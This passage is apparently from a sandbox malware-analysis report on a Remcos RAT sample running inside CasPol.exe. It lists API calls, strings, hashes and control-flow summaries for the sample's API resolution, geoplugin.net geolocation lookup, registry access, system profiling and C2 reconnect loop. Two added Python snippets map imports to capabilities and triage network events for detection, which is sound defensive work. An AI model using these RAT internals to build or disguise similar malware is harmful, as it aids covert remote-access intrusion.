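    "NtQueryInformationProcess": "query process internals (PEB address, parent PID, ...)",
    "GetExtendedTcpTable": "enumerate TCP endpoints with owning PIDs",
    "GetExtendedUdpTable": "enumerate UDP endpoints with owning PIDs",
    "IsUserAnAdmin": "check whether the current token is elevated",
    "SetProcessDEPPolicy": "change this process's DEP policy",
    "RmStartSession": "Restart Manager: find and stop processes holding a file",
}


def capability_report(imports: List[ResolvedImport]) -> Dict[str, Optional[str]]:
    """Map each resolved symbol to a capability description (None when unknown)."""
    return {imp.symbol: CAPABILITY.get(imp.symbol) for imp in imports}


if __name__ == "__main__":
    for imp in parse_resolver(SAMPLE_LISTING):
        print(f"{imp.module:10s} {imp.symbol:28s} @0x{imp.ref:08X}  {CAPABILITY.get(imp.symbol, '?')}")
```

Running it on the full listing above gives the complete table; duplicate names on different modules (GetProcessImageFileNameW against Psapi and then Kernel32) are kept as separate rows because they reflect a fallback chain rather than a parsing error.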

                            Control-flow Graph

control_flow_graph for 41b380 (basic blocks as listed in the original graph):
• 1082 41b380-41b3c3: call 4020df, call 43bd51, InternetOpenW, InternetOpenUrlW -> 1087
• 1087 41b3c5-41b3e6: InternetReadFile -> 1088, 1089
• 1088 41b3e8-41b408: call 4020b7, call 403376, call 401fd8 -> 1089
• 1089 41b40c-41b40f -> 1091, 1092
• 1091 41b411-41b413 -> 1087 (read loop), 1092
• 1092 41b415-41b422: InternetCloseHandle * 2, call 43bd4c -> 1096
• 1096 41b427-41b431
                            APIs
                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                            • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                            • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                            Strings
                            • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleOpen$FileRead
                            • String ID: http://geoplugin.net/json.gp
                            • API String ID: 3121278467-91888290
                            • Opcode ID: 4404311406b4a12e258bc180555c1bc499fb9e537e63fa9c5eb012b199318316
                            • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                            • Opcode Fuzzy Hash: 4404311406b4a12e258bc180555c1bc499fb9e537e63fa9c5eb012b199318316
                            • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
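The function above fetches http://geoplugin.net/json.gp with WinINet, and the snapshot file name shows the code running inside CasPol.exe, a .NET Framework utility. The script below is an added detection example (not part of the Joe Sandbox report or the Remcos sample) that triages outbound-connection records in the shape of a Sysmon Event ID 3 enriched with the request URL from a proxy log. The NetEvent shape and the sample events are constructed for this example. The assumption that .NET Framework utilities under \Microsoft.NET\Framework\ never make HTTP requests is ours, not the report's; and because geoplugin.net is a public geolocation service also used by benign software, a geoplugin hit on its own is only rated medium.

```python
import ntpath
from dataclasses import dataclass
from typing import List
from urllib.parse import urlsplit

# Indicators taken from the report: the hard-coded URL at 0041B3B7 and the
# host process named in the memory-dump snapshot (CasPol.exe).
GEO_HOST = "geoplugin.net"
GEO_PATH = "/json.gp"
# Assumption for this example: binaries shipped in the .NET Framework
# directories (Framework and Framework64) have no reason to talk HTTP.
DOTNET_FRAMEWORK_DIR = "\\microsoft.net\\framework"


@dataclass
class NetEvent:
    """One outbound connection: Sysmon Event ID 3 fields plus a proxy-log URL (constructed)."""
    image: str        # full path of the initiating process
    dest_host: str    # destination host name
    url: str = ""     # request URL when the proxy saw it, else empty


def is_geoplugin_checkin(ev: NetEvent) -> bool:
    """True when the destination is geoplugin.net (or a subdomain) and,
    if a URL is known, the path is the /json.gp endpoint the sample uses."""
    host = ev.dest_host.lower().rstrip(".")
    if host != GEO_HOST and not host.endswith("." + GEO_HOST):
        return False
    if not ev.url:
        return True   # host match is all we can check without a URL
    return urlsplit(ev.url).path.lower() == GEO_PATH


def is_unexpected_dotnet_host(ev: NetEvent) -> bool:
    """True when the connecting image lives in a .NET Framework directory
    (CasPol.exe in this report), which under our assumption never makes HTTP requests."""
    image = ev.image.lower()
    return DOTNET_FRAMEWORK_DIR in image and ntpath.basename(image).endswith(".exe")


def triage(events: List[NetEvent]) -> List[str]:
    """Rate each event high / medium / low by combining the two indicators."""
    ratings = []
    for ev in events:
        geo = is_geoplugin_checkin(ev)
        odd_host = is_unexpected_dotnet_host(ev)
        if geo and odd_host:
            ratings.append("high")      # hollowed .NET host doing the Remcos geo check-in
        elif geo or odd_host:
            ratings.append("medium")    # one indicator alone: worth a look, not a verdict
        else:
            ratings.append("low")
    return ratings


# Constructed sample events for a dry run.
SAMPLE_EVENTS = [
    NetEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
             "geoplugin.net", "http://geoplugin.net/json.gp"),
    NetEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe",
             "geoplugin.net", "http://geoplugin.net/json.gp"),
    NetEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
             "example.com"),
    NetEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
             "www.geoplugin.net", "http://www.geoplugin.net/"),
]

if __name__ == "__main__":
    for ev, rating in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{rating:6s} {ntpath.basename(ev.image)} -> {ev.dest_host}{urlsplit(ev.url).path}")
```

The first event (CasPol.exe fetching /json.gp) is the pattern this report documents; the third shows that the .NET-host indicator alone still surfaces CasPol.exe talking to a destination the report does not mention, which is the useful generalisation when the geolocation endpoint changes between builds.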

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                              • Part of subcall function 00413549: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                              • Part of subcall function 00413549: RegCloseKey.KERNELBASE(?), ref: 00413592
                            • Sleep.KERNELBASE(00000BB8), ref: 0040F85B
                            • ExitProcess.KERNEL32 ref: 0040F8CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseExitOpenProcessQuerySleepValue
                            • String ID: 5.1.0 Pro$override$pth_unenc
                            • API String ID: 2281282204-182549033
                            • Opcode ID: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                            • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                            • Opcode Fuzzy Hash: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                            • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                            APIs
                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00F9E638), ref: 00433849
                            • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Context$AcquireRandomRelease
                            • String ID:
                            • API String ID: 1815803762-0
                            • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                            • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                            • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                            • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                            APIs
                            • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,004750E4), ref: 0041B62A
                            • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$ComputerUser
                            • String ID:
                            • API String ID: 4229901323-0
                            • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                            • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                            • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                            • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                            APIs
                            • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                            • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                            • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                            • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                            Control-flow Graph

control_flow_graph for 40e9c5-40f3af (rendered as an interactive graph in the original report; kept here are the blocks that reach Windows APIs):
• 5 40e9c5-40ea47: call 41cb50 (the API resolver above), GetModuleFileNameW
• 69 40eb5d-40eba8 and 80 40ebcb-40ebea: call 413549 (registry read)
• 289 40efc3-40efda: call 41cd9b, CreateThread
• 295 40efea-40f0c6: StrToIntA, call 409de4
• 345 40f0c8-40f0ff, 358 40f11d-40f154, 368 40f16e-40f1c7: CreateThread (one per block)
• 400 40f240-40f241: SetProcessDEPPolicy
• 401 40f243-40f256, 406 40f258-40f262, 411 40f26d-40f277: CreateThread (one per block)
• 443 40f346-40f34b: DeleteFileW -> 445 40f32f-40f332 -> 446 40f334-40f341: Sleep -> 443 (retry loop), or -> 126
• 126 40f36f-40f3a0 -> 156 40f3a5-40f3af: call 40dd42, call 414f2a (the connection loop below)
                            APIs
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040E9EE
                              • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                            • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                            • API String ID: 2830904901-972522952
                            • Opcode ID: 30c98d85052ffbff03e9993bd8104adc494a48be42afa8666ff44a65e52adbf7
                            • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                            • Opcode Fuzzy Hash: 30c98d85052ffbff03e9993bd8104adc494a48be42afa8666ff44a65e52adbf7
                            • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                            Control-flow Graph

control_flow_graph for 414f2a-415ae5 (rendered as an interactive graph in the original report; kept here are the blocks that reach Windows APIs):
• 448 414f2a-414f72: calls 4020df, 41b8b3, 43baac -> 462 414f74-414f7b: Sleep -> 461
• 477 415041-4150dc: loop head (entered again from 598)
• 533 4150f8-41518a: call 414ee9 -> 561 41518c-4151d0: WSAGetLastError, call 41cae1 (error path), or -> 560 4151d5-4151e3: call 40482d
• 566 415210-415225: calls 404f51, 4048c8 (the connect routine below) -> 583
• 655 4153c0-41577f: GetTickCount among a long run of string-building calls
• 906 415a3d-415a6f -> 917 415a71-415a7d: CreateThread
• 582 415aa3-415ab5 -> 597 415ab7-415ad7: Sleep -> 598 415add-415ae5 -> 477 (reconnect loop)
                            APIs
                            • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                            • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                            • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: Sleep$ErrorLastLocalTime
                            • String ID: | $%I64u$5.1.0 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                            • API String ID: 524882891-1963623886
                            • Opcode ID: de291bc130383025817121ebc17e10697a1bf1b5d4139111e3b17213d67bbabe
                            • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                            • Opcode Fuzzy Hash: de291bc130383025817121ebc17e10697a1bf1b5d4139111e3b17213d67bbabe
                            • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                            APIs
                            • connect.WS2_32(?,?,?), ref: 004048E0
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                            • WSAGetLastError.WS2_32 ref: 00404A21
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            Similarity
                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                            • API String ID: 994465650-2151626615
                            • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                            • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                            • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                            • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

                            Control-flow Graph
                            • Graph image not included. Function at 0x40da34, basic blocks 0x40da34-0x40dc1b; Win32 APIs called from the graph: GetLongPathNameW
                            APIs
                            • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
                            Similarity
                            • API ID: LongNamePath
                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                            • API String ID: 82841172-425784914
                            • Opcode ID: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                            • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                            • Opcode Fuzzy Hash: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                            • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                            Control-flow Graph
                            • Graph image not included. Function at 0x41b2c3, basic blocks 0x41b2c3-0x41b37f; Win32 APIs called from the graph: StrToIntA
                            APIs
                              • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                              • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                              • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                              • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                            • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                            Similarity
                            • API ID: CloseCurrentOpenProcessQueryValue
                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            • API String ID: 1866151309-2070987746
                            • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                            • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                            • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                            • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

                            Similarity
                            • API ID: CountEventTick
                            • String ID: !D@$NG
                            • API String ID: 180926312-2721294649
                            • Opcode ID: d8b340ea6d4709a026dcc371673bc56ec9942c34c40e93aa1caf0058373bc741
                            • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                            • Opcode Fuzzy Hash: d8b340ea6d4709a026dcc371673bc56ec9942c34c40e93aa1caf0058373bc741
                            • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A

                            Control-flow Graph
                            • Graph image not included. Function at 0x404f51, basic blocks 0x404f51-0x404ff1; Win32 APIs called from the graph: GetLocalTime, CreateEventA, CreateThread
                            APIs
                            • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                            Similarity
                            • API ID: Create$EventLocalThreadTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            • API String ID: 2532271599-1507639952
                            • Opcode ID: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                            • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                            • Opcode Fuzzy Hash: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                            • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA

                            Control-flow Graph
                            • Graph image not included. Function at 0x41376f, basic blocks 0x41376f-0x4137cf; Win32 APIs called from the graph: RegCreateKeyA, RegSetValueExA, RegCloseKey
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                            • RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                            • RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: pth_unenc
                            • API String ID: 1818849710-4028850238
                            • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                            • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                            • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                            • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                            • CreateThread.KERNELBASE(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                            • FindCloseChangeNotification.KERNELBASE(?,?,00000000), ref: 00404DDB
                            Similarity
                            • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                            • String ID:
                            • API String ID: 2579639479-0
                            • Opcode ID: 86f3e289ee87dd2070e95c4c7186b2520882cd19ee190badebe9b582a3aec49f
                            • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                            • Opcode Fuzzy Hash: 86f3e289ee87dd2070e95c4c7186b2520882cd19ee190badebe9b582a3aec49f
                            • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

                            Control-flow Graph
                            • Graph image not included. Function at 0x40d069, single basic block 0x40d069-0x40d095; Win32 APIs called from the graph: CreateMutexA, GetLastError
                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                            • GetLastError.KERNEL32 ref: 0040D083
                            Similarity
                            • API ID: CreateErrorLastMutex
                            • String ID: SG
                            • API String ID: 1925916568-3189917014
                            • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                            • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                            • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                            • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

                            Control-flow Graph
                            • Graph image not included. Function at 0x4135a6, basic blocks 0x4135a6-0x41361a; Win32 APIs called from the graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                            • RegCloseKey.KERNELBASE(?), ref: 004135F2
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                            • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                            • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                            • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4

                            Control-flow Graph
                            • Graph image not included. Function at 0x4136f8, basic blocks 0x4136f8-0x41376e; Win32 APIs called from the graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                            • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                            • RegCloseKey.KERNELBASE(00000000), ref: 00413738
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                            • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                            • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                            • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
                            • _free.LIBCMT ref: 0044F41A
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
                            Similarity
                            • API ID: EnvironmentStrings$Free_free
                            • String ID:
                            • API String ID: 2716640707-0
                            • Opcode ID: f3c2c49517413e8eabdba28df60095274e0f4285ab7e88089faf331cb05c3344
                            • Instruction ID: a95b0472bde791e81118f5b212bf6f07b4125f005b99c6aef0626ee370485fe8
                            • Opcode Fuzzy Hash: f3c2c49517413e8eabdba28df60095274e0f4285ab7e88089faf331cb05c3344
